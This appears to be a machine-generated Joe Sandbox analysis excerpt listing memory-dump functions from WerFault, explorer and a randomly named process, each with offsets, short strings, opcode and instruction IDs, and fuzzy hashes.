                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 3Z_H$b4B$b4B$b4B
                                                • API String ID: 0-1711481409
                                                • Opcode ID: 67f212b33bc6a055de01acd819e24ad0ae4b1b15c91050ac43cdcd0666ddbafa
                                                • Instruction ID: ef989e9a70229e794a4ac27324381d5ffb612ee6226aafcffc0cd10f8a999282
                                                • Opcode Fuzzy Hash: 67f212b33bc6a055de01acd819e24ad0ae4b1b15c91050ac43cdcd0666ddbafa
                                                • Instruction Fuzzy Hash: 59413C71D4894E9FEF94DB98D8957ECBBF2FF58340F5041B9C00DE7286DA2819428B41

                                                Executed Functions

                                                Function 00007FF887B4109D Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0DL
                                                • API String ID: 0-3174716889
                                                • Opcode ID: 3091286ed490bbf2d9fd120e7c4a431b920596d325e65a27bf6c325334b890da
                                                • Instruction ID: 3418a8d3c889fbf9d743e821b19d7192065761dfc9e1991b7ff8ef75b390a63f
                                                • Opcode Fuzzy Hash: 3091286ed490bbf2d9fd120e7c4a431b920596d325e65a27bf6c325334b890da
                                                • Instruction Fuzzy Hash: 9081F670D89A1D9FEB94EA68D8956ECB7B2FF59740F5001B9C00DE7292DE386981CB40
                                                Function 00007FF887B416C5 Relevance: 2.6, Strings: 2, Instructions: 126COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: N_H$HBL
                                                • API String ID: 0-684199934
                                                • Opcode ID: 724d88f22ffe08e51b558e37f51f0e884f0f587df7b4fb83a3b5e69f26ffab0b
                                                • Instruction ID: 7813a343f2cad6831b14f2eabb91ad0bea8eb304367727f5ff8d40a4a234e9dd
                                                • Opcode Fuzzy Hash: 724d88f22ffe08e51b558e37f51f0e884f0f587df7b4fb83a3b5e69f26ffab0b
                                                • Instruction Fuzzy Hash: 59418C71D9864D9FEB45EBA8D8556FDBBB2FF15340F0401BAD009E7193DA386940CB41
                                                Function 00007FF887B405F8 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: N_H$HBL
                                                • API String ID: 0-684199934
                                                • Opcode ID: 01b40ee08d64b4ddb80d6e46d92f0d751a21cc84c64f63070514bd337a430aa6
                                                • Instruction ID: 559627c61b98db6357692ab0e0401a7ad11678b1325b312ebdce36b4409e260b
                                                • Opcode Fuzzy Hash: 01b40ee08d64b4ddb80d6e46d92f0d751a21cc84c64f63070514bd337a430aa6
                                                • Instruction Fuzzy Hash: C23156B1C5864D9FEB44EBA8D8157FDB6B2FF59780F0002BAD009E3296DE386940CB41
                                                Function 00007FF887B40C36 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0DL
                                                • API String ID: 0-3174716889
                                                • Opcode ID: 0bedf47f3fa622cb436005eafb6c576ba94a6ea0c16673d92e1fc38924de1630
                                                • Instruction ID: 2f1ce30252d0c5ccefc91108385e7326ab848ac6a6d5e7bb0b37c1fa4c9e8f80
                                                • Opcode Fuzzy Hash: 0bedf47f3fa622cb436005eafb6c576ba94a6ea0c16673d92e1fc38924de1630
                                                • Instruction Fuzzy Hash: D871C670D58A1D8FDBA4EB68D894BACB7B2FF59340F5041E9D41DE3292CA346981CF40
                                                Function 00007FF887B41AA0 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: H;H
                                                • API String ID: 0-2930457148
                                                • Opcode ID: 752dbb912178c49c962d372534ae51f6f53e01656ae765fe4864ab1b781536ab
                                                • Instruction ID: dd4326c2886b4dce2737331361a052f44a5af29d26ac1c07de8038bb5361c075
                                                • Opcode Fuzzy Hash: 752dbb912178c49c962d372534ae51f6f53e01656ae765fe4864ab1b781536ab
                                                • Instruction Fuzzy Hash: AD41E571D58A5D9FDB94EBA8D899BADBBF1FF28701F00006AD009E7255DB74A881CB40
                                                Function 00007FF887B41A81 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: H;H
                                                • API String ID: 0-2930457148
                                                • Opcode ID: 3f05aa5dc82f9e8f0519b82a2c106e12e0bb5db46ddb01d2560af6d86d46bee2
                                                • Instruction ID: ed524c03d1bd5aa5e4488f75cdc9fb26dc1819e1bb1f778256a3f5702a4fbc9d
                                                • Opcode Fuzzy Hash: 3f05aa5dc82f9e8f0519b82a2c106e12e0bb5db46ddb01d2560af6d86d46bee2
                                                • Instruction Fuzzy Hash: 4E410870D48A5C9FDB94EFA8D499BADBBF1FF28301F0401AAD409E7291DB74A841CB40
                                                Function 00007FF887B4318D Relevance: .4, Instructions: 382COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7c396e272343b0ee7931145306890fb76546d297e01288c4cd732e4d71dec70c
                                                • Instruction ID: 4b38a00a900d9923940c2366e2cbbb3632bd77c09efad22fd6732a20451511c0
                                                • Opcode Fuzzy Hash: 7c396e272343b0ee7931145306890fb76546d297e01288c4cd732e4d71dec70c
                                                • Instruction Fuzzy Hash: 9CD12771D586998FEB98DB68D8A47BCB7B2FF59340F1441B9D00DE3292CE386984CB41
                                                Function 00007FF887B45F75 Relevance: .4, Instructions: 374COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 877951a14a17e68e90433f1d82b09677a46da4ee6f916f9c097f1ff5e35cc8ad
                                                • Instruction ID: c4b22905e06858bb6fc7749d3909a0cea622f706243a6eb7003db537cafbfebf
                                                • Opcode Fuzzy Hash: 877951a14a17e68e90433f1d82b09677a46da4ee6f916f9c097f1ff5e35cc8ad
                                                • Instruction Fuzzy Hash: 3241B332D8D6598FDB45EBA8E4552FD7BB1EF06364F04027BD009E3182DE285945CB92
                                                Function 00007FF887B4149A Relevance: .2, Instructions: 216COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf94e74110768855860886039631cd9d5c167fe358c5df5d4d63136c34506054
                                                • Instruction ID: 56b45cfbc49597c427eabd14a43819877c7800fc249e82546c7d208bc89f178f
                                                • Opcode Fuzzy Hash: cf94e74110768855860886039631cd9d5c167fe358c5df5d4d63136c34506054
                                                • Instruction Fuzzy Hash: 7E51B631CCD14E4BEB659AA898012FCBBB2FF56391F14027AD45ED64C3EE18141AC791
                                                Function 00007FF887B417D5 Relevance: .2, Instructions: 172COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5111b6f6e1f24370ce5d25026ccb2c61183dd5e625ba2b0fd7167087e4a3215e
                                                • Instruction ID: a5b731da98debe448bdcd7dc2b3e340a00767ec378eae9e6351bdddb9c245b62
                                                • Opcode Fuzzy Hash: 5111b6f6e1f24370ce5d25026ccb2c61183dd5e625ba2b0fd7167087e4a3215e
                                                • Instruction Fuzzy Hash: 7A61EA70D1465D8FDB84EBA8D899BECBBB1FF58350F1041AAD00DE7292DB386985CB41
                                                Function 00007FF887B40A62 Relevance: .1, Instructions: 98COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a84c680e23cdd6d163b1411493157d450b59b901698742ea045c9da7c217454f
                                                • Instruction ID: c69a3575d2aa7dea5d5af38622b69783993c7edcb33729f302cb28546fecf623
                                                • Opcode Fuzzy Hash: a84c680e23cdd6d163b1411493157d450b59b901698742ea045c9da7c217454f
                                                • Instruction Fuzzy Hash: C1316FB2E5490E5FEB98EB98E4556FDBBB2FF54781F400075D11DE3696CE282C018B81
                                                Function 00007FF887B430C5 Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e0fd58a7d26cd2f5d31f0e296b96ec5526de34774f6d7242544458d58688363
                                                • Instruction ID: 9232c76d00bfd6fe1824db6d89bede723e300176a1c00c378a5bf57aab4fec21
                                                • Opcode Fuzzy Hash: 2e0fd58a7d26cd2f5d31f0e296b96ec5526de34774f6d7242544458d58688363
                                                • Instruction Fuzzy Hash: A331F23088D69D5FDB42EB649816AED7FB0FF0A310F0901B7E048E7192CA2C9545C7A1
                                                Function 00007FF887B458AA Relevance: .1, Instructions: 84COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3bf207cf392c7e0cff35f43098bc539cee014d9f13b7c271378d91bb41aff5dd
                                                • Instruction ID: 3e6d2715d94f2341428dd8c276b342d1de993c1629a24d98f2c5bb9a865d9944
                                                • Opcode Fuzzy Hash: 3bf207cf392c7e0cff35f43098bc539cee014d9f13b7c271378d91bb41aff5dd
                                                • Instruction Fuzzy Hash: 8821A130949A5D8FEB84EFA8D8546ED77B2FF99750F00047AE40AE7292DB385910CB51
                                                Function 00007FF887B40598 Relevance: .1, Instructions: 80COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f540d413340f0a6d3c9683cf2b17815049a1f315cc7d4ac54105def9934745e
                                                • Instruction ID: 74545b5af6bd61099bb89fe307676d4a2d9f52efe6ae7273b8d000fed82521e0
                                                • Opcode Fuzzy Hash: 0f540d413340f0a6d3c9683cf2b17815049a1f315cc7d4ac54105def9934745e
                                                • Instruction Fuzzy Hash: FE21C07194861E8FDB58DFA8D8446EEB7B2FB48350F10057AE419E2291DB38A950CB90
                                                Function 00007FF887B42F6A Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9bd0c5f8def160fde60b83091eb889f5b274e9beca3d2767261400a9694c72a0
                                                • Instruction ID: f81dce11ae1a15169b1bbf4e0535800f5ab52be39b56be089a8be547c754f569
                                                • Opcode Fuzzy Hash: 9bd0c5f8def160fde60b83091eb889f5b274e9beca3d2767261400a9694c72a0
                                                • Instruction Fuzzy Hash: 2621B634A5891D9FDF84EB98D495AECBBF2FF69340F511169D00DE7252CB24A841DB40
                                                Function 00007FF887B427E1 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4c6213084a471bc38e954aa405dd6a2ecba498224b259536b064123d9ff09088
                                                • Instruction ID: 29e5d5837403c1cb016e777ed457ea8a9033f9dcb86608102ac30b2a37546ea4
                                                • Opcode Fuzzy Hash: 4c6213084a471bc38e954aa405dd6a2ecba498224b259536b064123d9ff09088
                                                • Instruction Fuzzy Hash: 17016D3084C68D8FCB419BA4C814AEEBBF4FF46310F0502AAE048D7192D7385555CB51
                                                Function 00007FF887B408B1 Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 12ef30f38c81482f18c632b6d080428711b41c1e6b4d1ae26370794a41f78bb5
                                                • Instruction ID: 3b12fd980725d00e86f87821479c12cc9ece2bced445a1bbbc5d995516aa3e04
                                                • Opcode Fuzzy Hash: 12ef30f38c81482f18c632b6d080428711b41c1e6b4d1ae26370794a41f78bb5
                                                • Instruction Fuzzy Hash: A9018C3084868C8FD744EF2899483A87FA0FBA9355F5446AAD508C6296DB394458C792
                                                Function 00007FF887B40955 Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3f4e0d37617439115d8024e810be00be04c9bb028677ea369afc6a69304ce09e
                                                • Instruction ID: 56ffc5fb2ace171a6e00757a35ad944d949e87c5799c9ebacc628e9352dcccb4
                                                • Opcode Fuzzy Hash: 3f4e0d37617439115d8024e810be00be04c9bb028677ea369afc6a69304ce09e
                                                • Instruction Fuzzy Hash: 2AF0F031C98A4D9FEB44EB68D8482BDBBB1FF14300F4001BAD419C7192EF386984C701
                                                Function 00007FF887B41BE3 Relevance: .0, Instructions: 37COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ea7576a2d94b65b4c243990a9db8f9b945a6e04591d4e0833d3552cc9ea37ef5
                                                • Instruction ID: 06f784b8effbe7847a692d60bc6ffe2018dff1aec0cc23c9a9a5eda923ef75bf
                                                • Opcode Fuzzy Hash: ea7576a2d94b65b4c243990a9db8f9b945a6e04591d4e0833d3552cc9ea37ef5
                                                • Instruction Fuzzy Hash: 4FF0A431E4891D8FEF94EB9CD8856ECB7B2FB58341F50416AC40DE7246DE3858519B41

                                                Non-executed Functions

                                                Function 00007FF887B40648 Relevance: 6.6, Strings: 5, Instructions: 376COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.1491054748.00007FF887B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ff887b40000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "$"$-$[${
                                                • API String ID: 0-3019564589
                                                • Opcode ID: 6ee340e1b8784a404bf1e0fe04e808590eea457e49806c9487ff5bc23d2fd396
                                                • Instruction ID: edd6ebc7babfe75e90d2c3448b9eb1f264a6c69dad4ff74531a53b696e898218
                                                • Opcode Fuzzy Hash: 6ee340e1b8784a404bf1e0fe04e808590eea457e49806c9487ff5bc23d2fd396
                                                • Instruction Fuzzy Hash: B1E1D270D586298FEBA8DF68D8947EDB7B2FF58341F5041B9D44DA7281CA386A81CF40

                                                Executed Functions

                                                Function 00007FF887B5109D Relevance: 1.5, Strings: 1, Instructions: 289COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0DL
                                                • API String ID: 0-3174716889
                                                • Opcode ID: a33e26d3d38a8b0eba9b7135313c279840ff678893c7265787ad8e635f778a39
                                                • Instruction ID: 90de7bfe076cf85e07b6248aff6922f5021098dc54a59272be216c27356d93b1
                                                • Opcode Fuzzy Hash: a33e26d3d38a8b0eba9b7135313c279840ff678893c7265787ad8e635f778a39
                                                • Instruction Fuzzy Hash: AA914971D8995D9FEB94EE28D8956EDB7B2FF59340F4002B9C00DD7282DE39A981CB40
                                                Function 00007FF887B516C5 Relevance: 2.6, Strings: 2, Instructions: 126COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: M_H$HBL
                                                • API String ID: 0-3288315133
                                                • Opcode ID: a9d4f34f785a14dbe916ef50b26b269e5ecbd135f02884b22f121f3baa682f8b
                                                • Instruction ID: a642d54a5ad075a72879190767c421dc3c211d53fce177ea66d2624000bbbd2c
                                                • Opcode Fuzzy Hash: a9d4f34f785a14dbe916ef50b26b269e5ecbd135f02884b22f121f3baa682f8b
                                                • Instruction Fuzzy Hash: 1F419C71D1868E9FEB45EBA8D8556FDBBB2FF19340F0401B6D009E7293DA386900CB41
                                                Function 00007FF887B505F8 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: M_H$HBL
                                                • API String ID: 0-3288315133
                                                • Opcode ID: 8d9837676cd054609b21f5fdfe9d183bfe7e0f619afa8e0a22f8472814003bd1
                                                • Instruction ID: c881f19f252934aa4f2897fd1b33610f92b835db961b68eee9f0868d3aa97932
                                                • Opcode Fuzzy Hash: 8d9837676cd054609b21f5fdfe9d183bfe7e0f619afa8e0a22f8472814003bd1
                                                • Instruction Fuzzy Hash: FA3145B1C1868D9FEB44EBA8D8157EDB7B2FF59780F0002BAD009E3196DE386940CB41
                                                Function 00007FF887B55F75 Relevance: 1.8, Strings: 1, Instructions: 560COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8eL
                                                • API String ID: 0-2915619072
                                                • Opcode ID: 42b56424fa38d2f42760b4a19d81b2a822b0d06eec949e6011878bbad1140726
                                                • Instruction ID: d3f624521c3aa2d1b831af166e66f3e08b3b073e0540e04566ca530966887091
                                                • Opcode Fuzzy Hash: 42b56424fa38d2f42760b4a19d81b2a822b0d06eec949e6011878bbad1140726
                                                • Instruction Fuzzy Hash: D2B1B431D4869E8FEB44EBA8D8557FDBBB1FF45350F50017AD009D3282DA386945CB82
                                                Function 00007FF887B50C36 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0DL
                                                • API String ID: 0-3174716889
                                                • Opcode ID: 683c4f8988b4d01ae2dd3256c8f1486d5d793eb65be69f85abbca479fa236904
                                                • Instruction ID: 81532a7d36350895ace5aeef4f66d6d34fa27adbdcf19a165425c53be25b6121
                                                • Opcode Fuzzy Hash: 683c4f8988b4d01ae2dd3256c8f1486d5d793eb65be69f85abbca479fa236904
                                                • Instruction Fuzzy Hash: C171D670D4895D8FEB94EB68D899BACB7B1FF59340F5041A9D01DE3292DA34A981CF00
                                                Function 00007FF887B519CA Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: H;H
                                                • API String ID: 0-2930457148
                                                • Opcode ID: c51b0dd01e9e69afdd2706f30694c1172ed3394e4a451568b4c9b72012be1ad2
                                                • Instruction ID: 28468d44c4f32daa3f545be6e4a247fb55fb7390e81879804f75f5af8f04e616
                                                • Opcode Fuzzy Hash: c51b0dd01e9e69afdd2706f30694c1172ed3394e4a451568b4c9b72012be1ad2
                                                • Instruction Fuzzy Hash: EC515A70D48A8D8FDB95EFA8C8597ADBBF1FF19300F0401AAD409D7192DB38A885CB41
                                                Function 00007FF887B51AA0 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: H;H
                                                • API String ID: 0-2930457148
                                                • Opcode ID: e9d981a2a079a5e2c2f2f6b2b084cb2669ddc94119682697cefc984f0f63bc3a
                                                • Instruction ID: aa6fc016b2e8b38e6b041b956ce821fde5c0cc8eb038376ae988510c8fe3f718
                                                • Opcode Fuzzy Hash: e9d981a2a079a5e2c2f2f6b2b084cb2669ddc94119682697cefc984f0f63bc3a
                                                • Instruction Fuzzy Hash: 7A41C670D08A5D9FDF94EFA8D899BADBBF1FB68701F04016AD009E7255DB74A881CB40
                                                Function 00007FF887B5318D Relevance: .4, Instructions: 382COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 20b38e826ec13c7d96b9dd9023bfe7b44dfc1abb5b6be79a4b81749918eacb49
                                                • Instruction ID: bea07e1ddf1794afaf03f8e331b97228fb76dd429eceab8233411d732f0abe30
                                                • Opcode Fuzzy Hash: 20b38e826ec13c7d96b9dd9023bfe7b44dfc1abb5b6be79a4b81749918eacb49
                                                • Instruction Fuzzy Hash: 90D12771D186998FEB98DB68D8A47ECB7B2FF59344F1441B9D00DE3292CA386984CB41
                                                Function 00007FF887B5149A Relevance: .3, Instructions: 284COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be67a9382468ac2568aad3c822f59339d0f7430fb8fe9a2c07cd34b0ccd34631
                                                • Instruction ID: 6050973a7fa416a92a7cb20e6c344ab811555c9ea31f206e9f71f210c8af6833
                                                • Opcode Fuzzy Hash: be67a9382468ac2568aad3c822f59339d0f7430fb8fe9a2c07cd34b0ccd34631
                                                • Instruction Fuzzy Hash: 2091E731D8D2CE8FEB55DA68A8012FC7BB1FF56390F04027AD45AD71D2EA386806C791
                                                Function 00007FF887B527E1 Relevance: .2, Instructions: 200COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.1491055772.00007FF887B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_7ff887b50000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4dd98ad929eda03a7cf2f534035d4b2c17aeb7453223ec83158d5f5c31a7a8eb
                                                • Instruction ID: a0b658c46251b010c03750d48c1dd70eb780e16a4ff79c95744aee039321fdfa
                                                • Opcode Fuzzy Hash: 4dd98ad929eda03a7cf2f534035d4b2c17aeb7453223ec83158d5f5c31a7a8eb
                                                • Instruction Fuzzy Hash: 8A51903184968D9FCB41EBA4D8556EDBBF0FF4A310F4002BAD048D7292DB399995CB91
                                                Function 00007FF887B517D5 Relevance: .2, Instructions: 172COMMON
